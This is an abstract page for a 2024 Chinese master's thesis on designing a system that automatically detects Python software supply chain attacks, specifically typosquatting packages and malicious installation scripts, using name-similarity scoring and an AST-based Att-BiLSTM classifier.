Font Size: a A A

Design And Implementation Of An Automatic Detection System For Python Software Supply Chain Attacks

Posted on:2024-07-11Degree:MasterType:Thesis
Country:ChinaCandidate:Z G ChaiFull Text:PDF
GTID:2568306941984189Subject:Computer technology
Abstract/Summary:PDF Full Text Request
With the development of the internet and information technology industry,software systems are becoming increasingly larger and more complex,which places higher demands on the form of software development.At the same time,the software supply chain is rapidly developing,with open-source software accounting for an increasing proportion.As a result,attacks on the weak links in software supply chains are increasing exponentially,and software supply chain attacks frequently occur worldwide,with significant impact.In response to software supply chain attacks on Python,two low-cost and efficient attack methods have emerged:typosquatting attack and the insertion of malicious code through installation scripts.This paper proposes solutions to two problems,namely,how to improve the recall rate of typosquatting attack detection and how to effectively and accurately detect whether malicious code has been injected into Python package installation scripts.Based on these solutions,a Python software supply chain attack automatic detection system has been designed and implemented.The paper presents three main research achievements,including:1.To address the issue of low recall rate in current typosquatting attack detection,this paper proposes a typosquatting attack detection method based on package popularity and package name similarity.By analyzing and summarizing common package naming patterns in typosquatting attacks,the paper designs a package name similarity algorithm based on package naming patterns.Compared with classical algorithms such as Levenshtein edit distance,this algorithm can more accurately measure the similarity between package names.In addition,the paper divides the package popularity threshold and package name similarity threshold into two levels.This not only improves the recall rate of typosquatting attack detection but also avoids excessive alert prompts.Finally,the paper evaluates the effectiveness of the proposed typosquatting attack detection method through experiments.2.To address the issue of how to effectively and accurately detect whether malicious code is embedded in Python package installation scripts,this paper proposes a malicious installation script detection method based on AST and Att-BiLSTM.The paper adopts the approach of using deep learning algorithms to detect vulnerabilities that have emerged in recent years,and assigns the learning of malicious installation script features to neural networks to avoid manually defining features.By parsing the installation script source code into an abstract syntax tree to obtain code structure information,and then using the Word2Vec model to convert words into vector representations,the paper also considers the impact of TF-IDF values and sensitive API weight values on the final classification effect.Then,the BiLSTM model is used to capture bidirectional semantic dependencies in the program,and the Attention mechanism is introduced to identify the features that need to be focused on.The experimental results show that the accuracy of the proposed malicious installation script detection method reaches 87.36%.3.Based on the proposed method in this paper,a complete Python software supply chain attack automatic detection system has been designed and implemented.The system consists of two core modules:a typosquatting attack detection module and an installation script detection module,as well as a visual operating interface.In addition to being user-friendly,the system also has good usability.
Keywords/Search Tags:software supply chain, typosquatting attack, installation script, detection system
PDF Full Text Request
Related items